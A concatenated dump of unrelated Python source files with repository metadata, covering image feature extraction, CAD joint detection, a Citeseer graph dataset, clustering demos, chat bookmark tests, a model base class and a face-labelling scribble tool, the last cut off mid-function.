from src.lib.libic import init, set_opener
from src.lib.model_lib import feature_extractor
def initialize():
    """Prepare the datasets, the truncated InceptionV3 model and output paths.

    Returns a tuple ``(all_sets, path_dataset, model_popped, outputs)``:
    the train/test image-name lists, the dataset image directory, the
    InceptionV3 model with its final (output) layer removed, and the two
    pickle paths for the extracted train/test features.
    """
    # Identify this tool by its file stem when resolving project paths.
    program_name = os.path.basename(__file__).split('.')[0]
    paths = init(program_name)
    # First element of `paths` is the project home; make it the cwd.
    os.chdir(paths[0])
    # Second element bundles the five data / output paths.
    (path_dataset,
     path_train_set,
     path_test_set,
     path_extracted_train_features,
     path_extracted_test_features) = paths[1]
    # Drop the last (output) layer of InceptionV3 so that the network
    # emits feature vectors instead of class probabilities.
    base_model = InceptionV3(weights='imagenet')
    model_popped = Model(inputs=base_model.input, outputs=base_model.layers[-2].output)
    all_sets = [set_opener(path_train_set), set_opener(path_test_set)]
    outputs = [path_extracted_train_features, path_extracted_test_features]
    return all_sets, path_dataset, model_popped, outputs
def process_image(params):
    """Extract a feature vector for every image in each dataset split.

    Parameters
    ----------
    params : tuple
        ``(all_sets, path_dataset, model_popped, outputs)`` as produced by
        ``initialize()``: the per-split image-name lists, the image
        directory prefix, the truncated feature model, and the pickle
        output path for each split.

    Returns
    -------
    tuple
        ``(total_count, start_time)`` -- number of processed images and the
        timestamp taken before processing began.
    """
    all_sets, path_dataset, model_popped, outputs = params
    total_count = 0
    # set initial time
    start_time = time()
    for i, dataset in enumerate(all_sets):
        count = 0
        features_encoded = dict()
        for name in dataset:
            count += 1
            name = name.strip()
            image_path = path_dataset + name
            feature_vector = feature_extractor(image_path, model_popped)
            # Key the features by the file stem (name without extension).
            image_name = name.split('.')[0]
            features_encoded[image_name] = feature_vector
            print('> Processing {}/{}'.format(count, len(dataset)) + ' : %s' % name)
        total_count += count
        # store to file; `with` guarantees the handle is closed (the
        # original bare open() call leaked the file object).
        with open(outputs[i], 'wb') as out_file:
            dump(features_encoded, out_file)
        print("\nFeatures extracted :", len(features_encoded))
        print('Features saved to :', outputs[i], end='\n\n')
    return total_count, start_time
if __name__ == '__main__':
    # Build the model/datasets, extract features for every image, and
    # report the total count and wall-clock processing time.
    parameters = initialize()
    total, start = process_image(parameters)
    print("Total Features Extracted :", total)
    print("Processing Time :", time() - start, "sec")
| 1,763 | 0 | 46 |
88d25882c3afabb0780f4d023eb9910b8d7fe33c | 2,426 | py | Python | popupcad/algorithms/getjoints.py | popupcad/popupcad | d3da448260cd5cb9e05417b0a723d7f73ae4e06e | [
"MIT"
] | 19 | 2015-08-01T22:13:39.000Z | 2020-03-07T03:55:46.000Z | popupcad/algorithms/getjoints.py | CadQuery/popupcad | b0c7b406d4b288c7cb375340323bba0252aedbfb | [
"MIT"
] | 106 | 2015-07-23T19:58:01.000Z | 2019-05-14T03:46:08.000Z | popupcad/algorithms/getjoints.py | CadQuery/popupcad | b0c7b406d4b288c7cb375340323bba0252aedbfb | [
"MIT"
] | 9 | 2015-10-04T23:38:41.000Z | 2020-07-16T03:50:34.000Z | # -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
import popupcad
import numpy
| 41.118644 | 107 | 0.650453 | # -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
import popupcad
import numpy
def getjoints(geoms,roundvalue):
    """Find the joint segments shared by two or more geometries.

    Collects every boundary edge of every polygon in *geoms*, groups edges
    lying on the same supporting line (within a tolerance derived from
    *roundvalue*), and returns the sub-segments covered by more than one
    edge as GenericLine instances.

    :param geoms: iterable of polygon-like objects exposing
        exteriorpoints() / interiorpoints()
    :param roundvalue: decimal places used for rounding; the geometric
        tolerance is 10**(-roundvalue)
    :returns: list of GenericLine segments lying on shared edges
    """
    from popupcad.geometry.vertex import ShapeVertex
    from popupcad.filetypes.genericshapes import GenericLine
    tolerance = 10**(-roundvalue)
    # Gather all boundary edges as (v1, v2) pairs, closing each loop
    # (exterior ring plus every interior ring).
    lines = []
    for geom in geoms:
        p = geom.exteriorpoints()
        lines.extend(zip(p, p[1:] + p[:1]))
        for interior in geom.interiorpoints():
            lines.extend(zip(interior, interior[1:] + interior[:1]))
    # Fingerprint each edge's supporting line by its distance to five probe
    # points; presumably collinear edges then share identical (rounded)
    # fingerprints -- depends on distance_of_lines semantics (TODO confirm).
    l3 = popupcad.algorithms.points.distance_of_lines(lines, [0, 0])
    l4 = popupcad.algorithms.points.distance_of_lines(lines, [10 * tolerance, 0])
    l5 = popupcad.algorithms.points.distance_of_lines(lines, [10 * tolerance, 10 * tolerance])
    l6 = popupcad.algorithms.points.distance_of_lines(lines, [0, 10 * tolerance])
    l7 = popupcad.algorithms.points.distance_of_lines(lines, [10 * tolerance, 20 * tolerance])
    m = numpy.c_[l3, l4, l5, l6, l7]
    m = m.round(roundvalue)
    # Group edges whose fingerprints coincide: m3 holds the unique
    # fingerprints, indeces_to_orig maps each back to its edge indices.
    m2 = [tuple(items) for items in m.tolist()]
    m3 = list(set(m2))
    # jj = numpy.searchsorted(m3,m2)
    index_to_unique = [m3.index(item) for item in m2]
    indeces_to_orig = [[] for item in m3]
    [indeces_to_orig[item].append(ii) for ii, item in enumerate(index_to_unique)]
    newsegments = []
    for segments in indeces_to_orig:
        # Only groups with at least two collinear edges can share a joint.
        if len(segments) > 1:
            a = [lines[ii] for ii in segments]
            vertices = []
            [vertices.extend(item) for item in a[1:]]
            # Order all involved vertices along the common supporting line,
            # then split it into consecutive candidate sub-segments.
            ordered_vertices = popupcad.algorithms.points.order_vertices(vertices,a[0],tolerance=tolerance)
            segs = list(zip(ordered_vertices[:-1], ordered_vertices[1:]))
            midpoints = popupcad.algorithms.points.segment_midpoints(segs)
            # Count, per sub-segment, how many original edges cover its
            # midpoint; a joint is a sub-segment covered by >= 2 edges.
            count = [0 for item in midpoints]
            for ii in segments:
                for jj, point in enumerate(midpoints):
                    if popupcad.algorithms.points.point_within_line(point,lines[ii],tolerance=tolerance):
                        count[jj] += 1
            newsegments.extend([seg for count_ii, seg in zip(count, segs) if count_ii > 1])
    generic_lines = [GenericLine([ShapeVertex(v1), ShapeVertex(v2)], []) for v1, v2 in newsegments]
    # Drop degenerate results whose exterior collapsed to fewer than 2 points.
    generic_lines = [item for item in generic_lines if len(item.get_exterior()) == 2]
    return generic_lines
| 2,232 | 0 | 23 |
8a78348dbfb4191ec6ca8941fbe66e72e9808301 | 2,750 | py | Python | examples/citeseer/with_rule_weights/citeseer_data_withrules.py | ML-KULeuven/deepstochlog | 4b71d1e306d9cdbbb6237947533f0facfcc62c3a | [
"Apache-2.0"
] | 10 | 2021-12-06T02:07:19.000Z | 2022-03-24T11:40:10.000Z | examples/citeseer/with_structure_learning/citeseer_data_struct.py | ML-KULeuven/deepstochlog | 4b71d1e306d9cdbbb6237947533f0facfcc62c3a | [
"Apache-2.0"
] | null | null | null | examples/citeseer/with_structure_learning/citeseer_data_struct.py | ML-KULeuven/deepstochlog | 4b71d1e306d9cdbbb6237947533f0facfcc62c3a | [
"Apache-2.0"
] | null | null | null | import dgl
import numpy as np
from pathlib import Path
import torch
from deepstochlog.term import Term, List
from deepstochlog.context import ContextualizedTerm, Context
from deepstochlog.dataset import ContextualizedTermDataset
root_path = Path(__file__).parent
dataset = dgl.data.CiteseerGraphDataset()
g = dataset[0]
# get node feature
documents = g.ndata['feat']
# get data split
train_ids = np.where(g.ndata['train_mask'].numpy())[0]
val_ids = np.where(g.ndata['val_mask'].numpy())[0]
test_ids = np.where(g.ndata['test_mask'].numpy())[0]
# get labels
labels = g.ndata['label'].numpy()
edges = []
pretraining_data = documents[train_ids], torch.tensor(labels[train_ids])
citations = []
for eid in range(g.num_edges()):
a, b = g.find_edges(eid)
a, b = a.numpy().tolist()[0], b.numpy().tolist()[0],
edges.append((a,b))
citations.append("cite(%d, %d)." % (a,b))
citations = "\n".join(citations)
train_dataset = CiteseerDataset(split="train", documents=documents, labels=labels)
valid_dataset = CiteseerDataset(split="valid", documents=documents, labels=labels)
test_dataset = CiteseerDataset(split="test", documents=documents, labels=labels)
queries_for_model = train_dataset.queries_for_model + valid_dataset.queries_for_model + test_dataset.queries_for_model
| 27.227723 | 118 | 0.638545 | import dgl
import numpy as np
from pathlib import Path
import torch
from deepstochlog.term import Term, List
from deepstochlog.context import ContextualizedTerm, Context
from deepstochlog.dataset import ContextualizedTermDataset
root_path = Path(__file__).parent
# Citeseer citation graph from DGL: node features, split masks and labels.
dataset = dgl.data.CiteseerGraphDataset()
g = dataset[0]
# get node feature
documents = g.ndata['feat']
# get data split
train_ids = np.where(g.ndata['train_mask'].numpy())[0]
val_ids = np.where(g.ndata['val_mask'].numpy())[0]
test_ids = np.where(g.ndata['test_mask'].numpy())[0]
# get labels
labels = g.ndata['label'].numpy()
edges = []
# (features, labels) restricted to training nodes, e.g. for pre-training.
pretraining_data = documents[train_ids], torch.tensor(labels[train_ids])
citations = []
# Collect every edge both as a Python tuple and as a Prolog-style
# "cite(a, b)." fact (the latter joined into one program string below).
for eid in range(g.num_edges()):
    a, b = g.find_edges(eid)
    a, b = a.numpy().tolist()[0], b.numpy().tolist()[0],
    edges.append((a,b))
    citations.append("cite(%d, %d)." % (a,b))
citations = "\n".join(citations)
def queries_from_ids(ids, labels, is_test = False):
    # NOTE(review): incomplete stub -- it builds an empty list and
    # implicitly returns None, and nothing in this module calls it.
    # Confirm whether it can be removed or was meant to be finished.
    queries = []
class CiteseerDataset(ContextualizedTermDataset):
    """Dataset of contextualized DeepStochLog terms for Citeseer nodes.

    Each item is a ContextualizedTerm ``s(classK, [doc_id])`` whose shared
    context maps every document id to its feature vector and every
    ``classK`` term to the tensor ``[K]``.
    """
    def __init__(
        self,
        split: str,
        labels,
        documents):
        """Build the ground-truth queries for the given split.

        :param split: one of "train", "valid" or "test"
        :param labels: per-node class labels (indexed by node id)
        :param documents: per-node feature vectors (indexed by node id)
        """
        # Select node ids for the requested split (module-level arrays).
        if split == "train":
            self.ids = train_ids
        elif split =="valid":
            self.ids = val_ids
        elif split == "test":
            self.ids = test_ids
        else:
            # NOTE(review): message contains a typo ("Unkonw"); left as-is
            # here because it is a runtime string.
            raise Exception("Unkonw split %s" % split)
        self.labels = labels
        self.is_test = True if split in ("test", "valid") else False
        self.documents = documents
        self.dataset = []
        # Shared context: doc-id terms -> feature vectors, and classK ->
        # tensor([K]). Citeseer has 6 classes, hence range(6).
        context = {Term(str(i)): d for i, d in enumerate(self.documents)}
        for i in range(6):
            context[Term("class" + str(i))] = torch.tensor([i])
        context = Context(context)
        self.queries_for_model = []
        for did in self.ids:
            label = Term("class" + str(self.labels[did]))
            # Ground-truth query s(classK, [did]) used as a target.
            query = ContextualizedTerm(
                context=context,
                term=Term("s", label, List(did)))
            self.dataset.append(query)
            # Open query s(_, [did]) with the label unbound, for inference.
            query_model = Term("s", Term("_"), List(did))
            self.queries_for_model.append(query_model)
    def __len__(self):
        # Number of contextualized ground-truth queries.
        return len(self.dataset)
    def __getitem__(self, item):
        # Slices yield a generator over the sliced indices; ints index
        # the underlying list directly.
        if type(item) is slice:
            return (self[i] for i in range(*item.indices(len(self))))
        return self.dataset[item]
# Materialize the three splits and the combined list of open (unlabelled)
# queries handed to the DeepStochLog model.
train_dataset = CiteseerDataset(split="train", documents=documents, labels=labels)
valid_dataset = CiteseerDataset(split="valid", documents=documents, labels=labels)
test_dataset = CiteseerDataset(split="test", documents=documents, labels=labels)
queries_for_model = train_dataset.queries_for_model + valid_dataset.queries_for_model + test_dataset.queries_for_model
| 1,294 | 28 | 126 |
bd45559f8f04e1705dc47d872179c2148a85190e | 1,269 | py | Python | Chapter 09/Chapter_9_Agglomerative.py | bpbpublications/Machine-Learning-for-Beginners | 0f675c3290949c24da55839afb7f7f2dee3e694c | [
"MIT"
] | null | null | null | Chapter 09/Chapter_9_Agglomerative.py | bpbpublications/Machine-Learning-for-Beginners | 0f675c3290949c24da55839afb7f7f2dee3e694c | [
"MIT"
] | null | null | null | Chapter 09/Chapter_9_Agglomerative.py | bpbpublications/Machine-Learning-for-Beginners | 0f675c3290949c24da55839afb7f7f2dee3e694c | [
"MIT"
] | 2 | 2020-10-26T15:53:56.000Z | 2021-11-30T03:55:56.000Z | import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import AgglomerativeClustering
from sklearn.datasets import make_blobs
n_samples = 200
random_state = 10
X, y = make_blobs(n_samples=n_samples, random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering")
plt.show()
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
X_not_balanced = np.vstack((X[y == 0][:500], X[y == 1][:200], X[y == 2][:10]))
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_not_balanced)
plt.scatter(X_not_balanced[:, 0], X_not_balanced[:, 1], c=y_predicted)
plt.title("Blobs having differnt number of elements")
plt.show() | 37.323529 | 95 | 0.742317 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import AgglomerativeClustering
from sklearn.datasets import make_blobs
# Demo: agglomerative clustering on synthetic blob datasets.
n_samples = 200
random_state = 10
# Case 1: three blobs with default (equal) spread.
X, y = make_blobs(n_samples=n_samples, random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X)
plt.scatter(X[:, 0], X[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering")
plt.show()
# Case 2: blobs with unequal standard deviations.
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
# NOTE(review): the block below is an exact duplicate of Case 2 (same data,
# same title) and produces an identical second figure -- likely accidental.
X_1, y_1 = make_blobs(n_samples=n_samples, cluster_std=[1,0.5,3.0], random_state=random_state)
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_1)
plt.scatter(X_1[:, 0], X_1[:, 1], c=y_predicted)
plt.title("Agglomerative Clustering II")
plt.show()
# Case 3: clusters of very different sizes. With n_samples=200 each blob has
# ~67 points, so [:500] and [:200] keep whole clusters while [:10] keeps only
# ten points of the third. (The "differnt" typo below is in a runtime string
# and therefore left unchanged in this comment-only pass.)
X_not_balanced = np.vstack((X[y == 0][:500], X[y == 1][:200], X[y == 2][:10]))
y_predicted = AgglomerativeClustering(n_clusters=3).fit_predict(X_not_balanced)
plt.scatter(X_not_balanced[:, 0], X_not_balanced[:, 1], c=y_predicted)
plt.title("Blobs having differnt number of elements")
plt.show()
689c94debfde3113d405c1b7abc4201e58e794c3 | 5,225 | py | Python | test/functional/test_bookmark.py | thenetcircle/dino-service | 90f90e0b21ba920506dc8fc44caf69d5bed9fb6a | [
"MIT"
] | null | null | null | test/functional/test_bookmark.py | thenetcircle/dino-service | 90f90e0b21ba920506dc8fc44caf69d5bed9fb6a | [
"MIT"
] | 4 | 2021-05-24T04:31:34.000Z | 2021-06-28T03:38:56.000Z | test/functional/test_bookmark.py | thenetcircle/dino-service | 90f90e0b21ba920506dc8fc44caf69d5bed9fb6a | [
"MIT"
] | null | null | null | import arrow
from test.base import BaseTest
from test.functional.base_functional import BaseServerRestApi
| 43.907563 | 94 | 0.697225 | import arrow
from test.base import BaseTest
from test.functional.base_functional import BaseServerRestApi
class TestBookmark(BaseServerRestApi):
    """Functional tests for group bookmarks.

    Verifies that removing a bookmark resets a group's unread count,
    highlight time and last-read time for the bookmarking user.
    """
    def test_removing_bookmark_resets_unread_count(self):
        """Removing a bookmark clears the unread count it preserved."""
        self.assert_groups_for_user(0)
        group_message = self.send_1v1_message(
            user_id=BaseTest.USER_ID,
            receiver_id=BaseTest.OTHER_USER_ID
        )
        group_id = group_message["group_id"]
        # Receiving a 1v1 message creates the group with one unread message.
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(1, stats["unread"])
        self.assertEqual(False, stats["bookmark"])
        self.bookmark_group(group_id, bookmark=True, user_id=BaseTest.OTHER_USER_ID)
        # Bookmarking keeps the unread count intact.
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(1, stats["unread"])
        self.assertEqual(True, stats["bookmark"])
        self.bookmark_group(group_id, bookmark=False, user_id=BaseTest.OTHER_USER_ID)
        # Removing the bookmark resets the unread count to zero.
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(0, stats["unread"])
        self.assertEqual(False, stats["bookmark"])
    def test_removing_bookmark_resets_highlight(self):
        """Removing a bookmark resets highlight time (both sides)."""
        self.assert_groups_for_user(0)
        group_message = self.send_1v1_message(
            user_id=BaseTest.USER_ID,
            receiver_id=BaseTest.OTHER_USER_ID
        )
        group_id = group_message["group_id"]
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(1, stats["unread"])
        self.assertEqual(self.long_ago, stats["highlight_time"])
        # highlight the group
        self.highlight_group_for_user(
            group_id,
            user_id=BaseTest.OTHER_USER_ID,
            highlight_time=arrow.utcnow().float_timestamp
        )
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(1, stats["unread"])
        self.assertEqual(False, stats["bookmark"])
        self.assertLess(self.long_ago, stats["highlight_time"])
        # add the bookmark
        self.bookmark_group(group_id, bookmark=True, user_id=BaseTest.OTHER_USER_ID)
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(1, stats["unread"])
        self.assertEqual(True, stats["bookmark"])
        self.assertLess(self.long_ago, stats["highlight_time"])
        # The sender sees the same highlight via receiver_highlight_time.
        receiver_stats = self.groups_for_user(BaseTest.USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(stats["highlight_time"], receiver_stats["receiver_highlight_time"])
        self.assertLess(self.long_ago, receiver_stats["receiver_highlight_time"])
        # remove the bookmark should reset highlight time and unread count
        self.bookmark_group(group_id, bookmark=False, user_id=BaseTest.OTHER_USER_ID)
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(0, stats["unread"])
        self.assertEqual(False, stats["bookmark"])
        self.assertEqual(self.long_ago, stats["highlight_time"])
        receiver_stats = self.groups_for_user(BaseTest.USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(stats["highlight_time"], receiver_stats["receiver_highlight_time"])
        self.assertEqual(self.long_ago, receiver_stats["receiver_highlight_time"])
    def test_removing_bookmark_resets_last_read(self):
        """Bookmarks freeze last_read_time; removal bumps it forward."""
        self.assert_groups_for_user(0)
        group_message = self.send_1v1_message(
            user_id=BaseTest.USER_ID,
            receiver_id=BaseTest.OTHER_USER_ID
        )
        group_id = group_message["group_id"]
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(1, stats["unread"])
        self.assertEqual(self.long_ago, stats["highlight_time"])
        # Reading the history sets the user's last_read_time.
        self.histories_for(group_id, user_id=BaseTest.OTHER_USER_ID)
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        last_read_time = stats["last_read_time"]
        # add the bookmark
        self.bookmark_group(group_id, bookmark=True, user_id=BaseTest.OTHER_USER_ID)
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(True, stats["bookmark"])
        self.assertEqual(last_read_time, stats["last_read_time"])
        # send another message
        self.send_1v1_message(
            user_id=BaseTest.USER_ID,
            receiver_id=BaseTest.OTHER_USER_ID
        )
        # last read time should be same as before
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(True, stats["bookmark"])
        self.assertEqual(last_read_time, stats["last_read_time"])
        # remove the bookmark should reset last read time
        self.bookmark_group(group_id, bookmark=False, user_id=BaseTest.OTHER_USER_ID)
        stats = self.groups_for_user(BaseTest.OTHER_USER_ID, count_unread=True)[0]["stats"]
        self.assertEqual(False, stats["bookmark"])
        self.assertLess(last_read_time, stats["last_read_time"])
| 4,997 | 17 | 103 |
8d3c8515db4ba357929aae6dc7f1097c043238d0 | 3,099 | py | Python | mml/models/__init__.py | feedbackward/mml | d257e0508d75c86c63f01dd6cfe6b48b79e0d4d4 | [
"MIT"
] | null | null | null | mml/models/__init__.py | feedbackward/mml | d257e0508d75c86c63f01dd6cfe6b48b79e0d4d4 | [
"MIT"
] | null | null | null | mml/models/__init__.py | feedbackward/mml | d257e0508d75c86c63f01dd6cfe6b48b79e0d4d4 | [
"MIT"
] | null | null | null | '''Models: base class definitions.'''
###############################################################################
## For reference:
## Throughout this library, we work with the tacit assumption
## that the "parameters" (i.e., values of "paras" dicts) are
## such that paras[key].ndim >= 2, even if they are in essence
## just a single scalar rather than a vector/mtx/array.
## Default general-purpose random parameter initialization function(s).
init_range = 0.05
def random_init(shape, rg, range_low=-init_range, range_high=init_range):
    '''
    Draw an initial parameter array uniformly at random.

    Arguments:
    shape: shape of the array to generate.
    rg: numpy.random.Generator supplying the draws.
    range_low, range_high: bounds of the half-open sampling
    interval [range_low, range_high).
    '''
    return rg.uniform(low=range_low, high=range_high, size=shape)
## Definition of base model class.
class Model:
    '''
    Model objects represent collections of parametrized
    functions. Each function takes some "inputs" (denoted X),
    and is determined by a dictionary of "parameters" (denoted paras).
    These parameters are the "state" of the Model object, and
    represent a particular choice of candidate from the
    hypothesis class implicitly represented by the Model object.
    Handy references (property, getter/setter):
    https://docs.python.org/3/library/functions.html#property
    https://stackoverflow.com/a/15930977
    '''
    def __init__(self, paras_init=None, name=None):
        '''
        Initialize the model state.
        paras_init: initial parameter dict (or None), exposed through
        the "paras" property and passed to func() by __call__.
        name: display name; defaults to the concrete class name.
        (Fix: __str__ and the paras property read self.name and
        self._paras, which were never set without this initializer.)
        '''
        self._paras = paras_init
        if name is None:
            self.name = self.__class__.__name__
        else:
            self.name = name
        return None
    @property
    def paras(self):
        '''
        Get the current parameter dict.
        '''
        return self._paras
    @paras.setter
    def paras(self, paras_new):
        '''
        Set new parameters.
        Can do the entire dictionary all at once,
        or one can do it one element at a time,
        e.g., something like
        >> model.paras["key"] = value
        can be done as desired.
        '''
        self._paras = paras_new
    def __str__(self):
        '''
        For printing out the relevant model name.
        '''
        out = "Model name: {}".format(self.name)
        return out
    def __call__(self, X=None):
        '''
        Lets us compute model outputs as model(X).
        '''
        return self.func(paras=self._paras, X=X)
    def func(self, paras=None, X=None):
        '''
        Execute the model on given inputs.
        (implemented in child classes)
        '''
        raise NotImplementedError
    def grad(self, paras=None, X=None):
        '''
        When applicable, compute the gradient with
        respect to the relevant parameters.
        (implemented in child classes)
        '''
        raise NotImplementedError
    def hess(self, paras=None, X=None):
        '''
        When applicable, compute the Hessian with
        respect to the relevant parameters.
        (implemented in child classes)
        '''
        raise NotImplementedError
###############################################################################
| 27.184211 | 79 | 0.578251 | '''Models: base class definitions.'''
###############################################################################
## For reference:
## Throughout this library, we work with the tacit assumption
## that the "parameters" (i.e., values of "paras" dicts) are
## such that paras[key].ndim >= 2, even if they are in essence
## just a single scalar rather than a vector/mtx/array.
## Default general-purpose random parameter initialization function(s).
init_range = 0.05
def random_init(shape, rg, range_low=-init_range, range_high=init_range):
'''
A simple initial randomizer using uniformly generated values.
'''
return rg.uniform(low=range_low,
high=range_high,
size=shape)
## Definition of base model class.
class Model:
    '''
    Base class for parametrized function collections.
    A Model bundles a "paras" dictionary (its mutable state, one
    candidate from the hypothesis class the object represents) with
    callables that consume inputs X. Child classes override
    func/grad/hess with concrete computations.
    Handy references (property, getter/setter):
    https://docs.python.org/3/library/functions.html#property
    https://stackoverflow.com/a/15930977
    '''
    def __init__(self, paras_init=None, name=None):
        '''
        Record the initial parameters and pick a display name
        (the concrete class name unless one is supplied).
        '''
        self._paras = paras_init
        self.name = self.__class__.__name__ if name is None else name
    @property
    def paras(self):
        '''
        The current parameter dictionary.
        '''
        return self._paras
    @paras.setter
    def paras(self, paras_new):
        '''
        Replace the parameter dictionary wholesale; individual
        entries can also be updated via model.paras["key"] = value.
        '''
        self._paras = paras_new
    def __str__(self):
        '''
        Human-readable tag showing the model name.
        '''
        return "Model name: {}".format(self.name)
    def __call__(self, X=None):
        '''
        Make the model callable: model(X) evaluates func on the
        currently stored parameters.
        '''
        return self.func(paras=self._paras, X=X)
    def func(self, paras=None, X=None):
        '''
        Evaluate the model on inputs X (child classes implement).
        '''
        raise NotImplementedError
    def grad(self, paras=None, X=None):
        '''
        Gradient with respect to the parameters, when defined
        (child classes implement).
        '''
        raise NotImplementedError
    def hess(self, paras=None, X=None):
        '''
        Hessian with respect to the parameters, when defined
        (child classes implement).
        '''
        raise NotImplementedError
| 195 | 0 | 31 |
ffa1c51a918aeb4c248717083899dd625abcf68f | 145 | py | Python | print_linux.py | bicubico/neuralprinter | 62abb0149d99e85c011e49d5b3b18cfd685b5057 | [
"MIT"
] | 1 | 2017-12-28T16:49:07.000Z | 2017-12-28T16:49:07.000Z | print_linux.py | bicubico/neuralprinter | 62abb0149d99e85c011e49d5b3b18cfd685b5057 | [
"MIT"
] | null | null | null | print_linux.py | bicubico/neuralprinter | 62abb0149d99e85c011e49d5b3b18cfd685b5057 | [
"MIT"
] | null | null | null | #/usr/bin/python3
import os
| 16.111111 | 47 | 0.662069 | #/usr/bin/python3
import os
def print_image(filename, print_image = False):
    '''
    Send the file at `filename` to the default printer via ``lp``,
    but only when the flag is truthy. The flag keeps its historical
    name (shadowing the function) so existing keyword callers work.
    '''
    if not print_image:
        return
    os.system('lp ' + filename)
| 94 | 0 | 23 |
059066382c7b7496bd4a30a0887999e34e197a7a | 6,840 | py | Python | scripts/elfw-scribbleMe.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 15 | 2020-07-10T08:19:13.000Z | 2022-02-24T08:52:24.000Z | scripts/elfw-scribbleMe.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 7 | 2020-08-11T06:26:54.000Z | 2021-04-23T08:32:21.000Z | scripts/elfw-scribbleMe.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 5 | 2020-08-11T09:09:42.000Z | 2020-11-25T12:02:54.000Z | # This code fills superpixels by scribbling over the image with a given labeled color.
# It requires all jpg faces storaged in the same folder and the .dat super-pixels in the same LFW format.
# R. Redondo, Eurecat 2019 (c).
import numpy as np
import operator
import cv2
import os
import sys
resize = 3
pointer = (-1,-1)
super_scribbles = []
isDrawing = False
radius = 10
category = 1
label_colors = [
( 0, 0, 0),
( 0,255, 0),
( 0, 0,255),
(255,255, 0),
(255, 0, 0),
(255, 0,255)]
label_names = [
"eraser",
"skin",
"hair",
"beard-mustache",
"sunglasses",
"wearable"]
# ---------------------------------------------------------------------------------------
if len(sys.argv) != 4:
print("Usage: $ elfw-scribbleMe <faces_folder> <superpixels_folder> <output_folder>")
exit(0)
faces_folder = sys.argv[1]
sp_folder = sys.argv[2]
output_folder = sys.argv[3]
if not os.path.exists(output_folder):
os.mkdir(output_folder)
# faces_folder = '../Datasets/lfw-deepfunneled/'
# sp_folder = '../Datasets/lfw-deepfunneled-sp/'
# output_folder = '../Datasets/lfw-deepfunneled-sp-overlay/'
for face_file in sorted(os.listdir(faces_folder)):
if not face_file.endswith(".jpg"):
continue
file_name = os.path.splitext(face_file)[0]
super_scribbles_file = os.path.join(output_folder, file_name + '.png')
if os.path.exists(super_scribbles_file):
continue
face = cv2.imread(os.path.join(faces_folder, face_file))
person_name = file_name[:-5]
sp_file = os.path.join(os.path.join(sp_folder, person_name), file_name + '.dat')
if not os.path.exists( sp_file ):
print('\033[1m' + 'Superpixels not found in ' + sp_file + '\033[0m')
exit(0)
print('Editing ' + '\033[1m' + file_name + '\033[0m' + "...")
# Superpixels: watch out, SP do not have univoque numbering
sp = np.fromfile(sp_file, dtype=int, count=-1, sep=' ')
sp = np.array(sp, dtype=np.uint8)
sp = np.reshape(sp, (250, -1))
h, w = sp.shape
# Superpixels bounds
bounds = np.zeros(sp.shape)
for y in range(0, h):
for x in range(0, w):
if y > 0:
if sp[y, x] != sp[y-1, x ]:
bounds[y,x] = 255;
continue
if y < h-1:
if sp[y, x] != sp[y+1, x ]:
bounds[y,x] = 255;
continue
if y < h-1 and x > 0:
if sp[y, x] != sp[y+1, x-1]:
bounds[y,x] = 255;
continue
if y < h-1 and x < w-1:
if sp[y, x] != sp[y+1, x+1]:
bounds[y,x] = 255;
continue
if y > 0 and x > 0:
if sp[y, x] != sp[y-1, x-1]:
bounds[y,x] = 255;
continue
if y > 0 and x < w-1:
if sp[y, x] != sp[y-1, x+1]:
